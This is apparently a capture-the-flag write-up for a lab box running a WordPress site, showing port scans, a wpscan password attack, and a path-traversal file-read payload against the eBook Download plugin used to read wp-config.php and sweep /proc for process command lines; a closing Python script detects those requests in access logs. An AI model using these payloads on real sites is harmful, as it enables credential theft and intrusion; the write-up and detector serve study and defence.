```console
$ sudo rustscan -b 8192 -u 16384 -a 10.10.11.125 -- -sS -sV -sC -oN 10.10.11.125.$(basename $PWD).nmap.txt
# Nmap 7.92 scan initiated Sun Dec 19 01:14:47 2021 as: nmap -vvv -p 22,80,1337 -sS -sV -sC -oN 10.10.11.125.backdoor.nmap.txt 10.10.11.125
Nmap scan report for 10.10.11.125
Host is up, received echo-reply ttl 63 (0.082s latency).
Scanned at 2021-12-19 01:14:48 PST for 20s

PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
|   256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIuoNkiwwo7nM8ZE767bKSHJh+RbMsbItjTbVvKK4xKMfZFHzroaLEe9a2/P1D9h2M6khvPI74azqcqnI8SUJAk=
|   256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB7eoJSCw4DyNNaFftGoFcX4Ttpwf+RPo0ydNk7yfqca
80/tcp   open  http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-generator: WordPress 5.8.1
|_http-title: Backdoor – Real-Life
1337/tcp open  waste?  syn-ack ttl 63
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Dec 19 01:15:08 2021 -- 1 IP address (1 host up) scanned in 20.55 seconds
```
| Port | Service | Enumerated? |
|---|---|---|
| 22 | OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 | ✅ |
| 80 | Apache httpd 2.4.41 | ✅ |
| 1337 | What's this?? | |
Digging around the web server on port 80 we can tell it's running WordPress, so let's run `wpscan` to enumerate themes, users, and plugins.
```console
$ wpscan --url http://10.10.11.125 -e ap,at,tt,cb,dbe,u,m --update --plugins-detection aggressive --plugins-version-detection aggressive -P /usr/share/wordlists/rockyou.txt -U admin
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.20
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://10.10.11.125/ [10.10.11.125]
[+] Started: Sun Dec 19 01:34:53 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.11.125/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://10.10.11.125/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://10.10.11.125/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.11.125/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.8.1 identified (Insecure, released on 2021-09-09).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.11.125/index.php/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>
 |  - http://10.10.11.125/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://10.10.11.125/wp-content/themes/twentyseventeen/
 | Latest Version: 2.8 (up to date)
 | Last Updated: 2021-07-22T00:00:00.000Z
 | Readme: http://10.10.11.125/wp-content/themes/twentyseventeen/readme.txt
 | Style URL: http://10.10.11.125/wp-content/themes/twentyseventeen/style.css?ver=20201208
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.8 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.11.125/wp-content/themes/twentyseventeen/style.css?ver=20201208, Match: 'Version: 2.8'

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations -: |=====================|
[+] Checking Plugin Versions (via Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://10.10.11.125/wp-content/plugins/akismet/
 | Latest Version: 4.2.1
 | Last Updated: 2021-10-01T18:28:00.000Z
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.10.11.125/wp-content/plugins/akismet/, status: 403
 |
 | The version could not be determined.

[+] ebook-download
 | Location: http://10.10.11.125/wp-content/plugins/ebook-download/
 | Last Updated: 2020-03-12T12:52:00.000Z
 | Readme: http://10.10.11.125/wp-content/plugins/ebook-download/readme.txt
 | [!] The version is out of date, the latest version is 1.5
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.10.11.125/wp-content/plugins/ebook-download/, status: 200
 |
 | Version: 1.1 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.11.125/wp-content/plugins/ebook-download/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://10.10.11.125/wp-content/plugins/ebook-download/readme.txt

[+] Enumerating All Themes (via Passive and Aggressive Methods)
 Checking Known Locations -: |====================================|
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] Theme(s) Identified:

[+] twentynineteen
 | Location: http://10.10.11.125/wp-content/themes/twentynineteen/
 | Latest Version: 2.1 (up to date)
 | Last Updated: 2021-07-22T00:00:00.000Z
 | Readme: http://10.10.11.125/wp-content/themes/twentynineteen/readme.txt
 | Style URL: http://10.10.11.125/wp-content/themes/twentynineteen/style.css
 | Style Name: Twenty Nineteen
 | Style URI: https://wordpress.org/themes/twentynineteen/
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.10.11.125/wp-content/themes/twentynineteen/, status: 500
 |
 | Version: 2.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.11.125/wp-content/themes/twentynineteen/style.css, Match: 'Version: 2.1'

[+] twentyseventeen
 | Location: http://10.10.11.125/wp-content/themes/twentyseventeen/
 | Latest Version: 2.8 (up to date)
 | Last Updated: 2021-07-22T00:00:00.000Z
 | Readme: http://10.10.11.125/wp-content/themes/twentyseventeen/readme.txt
 | Style URL: http://10.10.11.125/wp-content/themes/twentyseventeen/style.css
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Known Locations (Aggressive Detection)
 |  - http://10.10.11.125/wp-content/themes/twentyseventeen/, status: 500
 |
 | Version: 2.8 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.11.125/wp-content/themes/twentyseventeen/style.css, Match: 'Version: 2.8'

[+] twentytwenty
 | Location: http://10.10.11.125/wp-content/themes/twentytwenty/
 | Latest Version: 1.8 (up to date)
 | Last Updated: 2021-07-22T00:00:00.000Z
 | Readme: http://10.10.11.125/wp-content/themes/twentytwenty/readme.txt
 | Style URL: http://10.10.11.125/wp-content/themes/twentytwenty/style.css
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.10.11.125/wp-content/themes/twentytwenty/, status: 500
 |
 | Version: 1.8 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.11.125/wp-content/themes/twentytwenty/style.css, Match: 'Version: 1.8'

[+] twentytwentyone
 | Location: http://10.10.11.125/wp-content/themes/twentytwentyone/
 | Latest Version: 1.4 (up to date)
 | Last Updated: 2021-07-22T00:00:00.000Z
 | Readme: http://10.10.11.125/wp-content/themes/twentytwentyone/readme.txt
 | Style URL: http://10.10.11.125/wp-content/themes/twentytwentyone/style.css
 | Style Name: Twenty Twenty-One
 | Style URI: https://wordpress.org/themes/twentytwentyone/
 | Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.10.11.125/wp-content/themes/twentytwentyone/, status: 500
 |
 | Version: 1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.11.125/wp-content/themes/twentytwentyone/style.css, Match: 'Version: 1.4'

[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
 Checking Known Locations -: |====================================|
[i] No Timthumbs Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups -: |====================================|
[i] No Config Backups Found.

[+] Enumerating DB Exports (via Passive and Aggressive Methods)
 Checking DB Exports -: |====================================|
[i] No DB Exports Found.

[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
 Brute Forcing Attachment IDs -: |====================================|
[i] No Medias Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs -: |====================================|

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.11.125/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] Performing password attack on Wp Login against 1 user/s
Progress: |
Progress: |
```
The eBook Download plugin was quickly identified as a vulnerable plugin. Looking in searchsploit we find an example LFI to use:

```
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
```
In the `wp-config.php` file we find a username `wordpressuser` and a password. This turned out to be largely useless.

However, we can continue to use the LFI to figure out what else is running on the system. Of particular interest is what is running on port 1337, because so far we have not been able to interact with the service via `curl` or `netcat` in any meaningful way.

Since we have LFI we can use that to inspect the various processes running on the system and try to figure out what might be listening on port 1337.

Here I use `ffuf` to receive the numbers 1-2000 from stdin as the word list input to `-w`, regex match on `:1337` with `-mr`, and check all processes on the filesystem via `/proc/FUZZ/cmdline`.
```console
$ seq 1 2000 | ffuf -mr ':1337' -w - -u 'http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/FUZZ/cmdline'
________________________________________________

 :: Method           : GET
 :: URL              : http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/FUZZ/cmdline
 :: Wordlist         : FUZZ: -
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Regexp: :1337
________________________________________________

813                     [Status: 200, Size: 181, Words: 11, Lines: 1]
815                     [Status: 200, Size: 148, Words: 5, Lines: 1]
864                     [Status: 200, Size: 145, Words: 5, Lines: 1]
865                     [Status: 200, Size: 122, Words: 1, Lines: 1]
:: Progress: [1500/1500] :: Job [1/1] :: 250 req/sec :: Duration: [0:00:06] :: Errors: 0 ::
```
`ffuf` helpfully shows us that PID 813 has `:1337` in its command line, so let's use our previous LFI to see what that PID is:

```console
$ curl -o- 'http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/813/cmdline'
/proc/813/cmdline/proc/813/cmdline/proc/813/cmdline/bin/sh-cwhile true;do su user -c "cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;"; done<script>window.close()</script>
```

The arguments run together because `/proc/<pid>/cmdline` separates them with NUL bytes, which do not render here; read with those separators restored, PID 813 is `/bin/sh -c 'while true; do su user -c "cd /home/user; gdbserver --once 0.0.0.0:1337 /bin/true;"; done'`, a gdbserver restarted in a loop on port 1337 as `user`.
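As an added, defender-side example (not part of the original writeup), here is a small Python log check for the request pattern used above: it parses constructed Apache access-log lines and flags `filedownload.php` requests whose `ebookdownloadurl` parameter carries path traversal, an absolute local path, or a `/proc/<pid>/` read, and reports source IPs with repeated `/proc` reads as a sweep of the kind the ffuf run produces. The log lines and IPs are constructed for the example, not taken from the box.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlsplit

PLUGIN_PATH = "/wp-content/plugins/ebook-download/filedownload.php"

# Constructed Apache access-log lines (not from the real box), modelled on the
# wp-config.php read and the /proc/<pid>/cmdline sweep in the writeup.
SAMPLE_LOG = """\
10.10.14.2 - - [19/Dec/2021:01:40:12 -0800] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1" 200 3210 "-" "curl/7.80.0"
10.10.14.2 - - [19/Dec/2021:01:52:03 -0800] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/813/cmdline HTTP/1.1" 200 181 "-" "curl/7.80.0"
10.10.14.2 - - [19/Dec/2021:01:52:03 -0800] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/814/cmdline HTTP/1.1" 200 115 "-" "curl/7.80.0"
10.10.14.2 - - [19/Dec/2021:01:55:40 -0800] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 2601 "-" "curl/7.80.0"
192.168.1.5 - - [19/Dec/2021:01:53:44 -0800] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=http://backdoor.htb/wp-content/uploads/book.pdf HTTP/1.1" 200 90210 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def lfi_indicators(target):
    """Reasons a request to the plugin looks like local file disclosure; [] if benign."""
    parts = urlsplit(target)
    if parts.path != PLUGIN_PATH:
        return []
    value = parse_qs(parts.query).get("ebookdownloadurl", [""])[0]
    decoded = unquote(value)  # parse_qs decoded once already; a second pass exposes double-encoding
    reasons = []
    if ".." in decoded:
        reasons.append("path traversal")
    if decoded.startswith(("/", "file:")):
        reasons.append("absolute local path")
    if re.search(r"/proc/(\d+|self)/", decoded):
        reasons.append("/proc read")
    return reasons

def scan_log(text):
    """(source ip, request target, reasons) for every suspicious plugin request in the log."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            reasons = lfi_indicators(m["target"])
            if reasons:
                hits.append((m["ip"], m["target"], reasons))
    return hits

def proc_sweeps(hits, threshold=2):
    """Source IPs with at least `threshold` /proc reads: the shape of a PID sweep like the ffuf run."""
    counts = Counter(ip for ip, _, reasons in hits if "/proc read" in reasons)
    return {ip: n for ip, n in counts.items() if n >= threshold}
```

A legitimate plugin download (an `http://` URL to an uploaded file) produces no indicators, so the check does not fire on normal use.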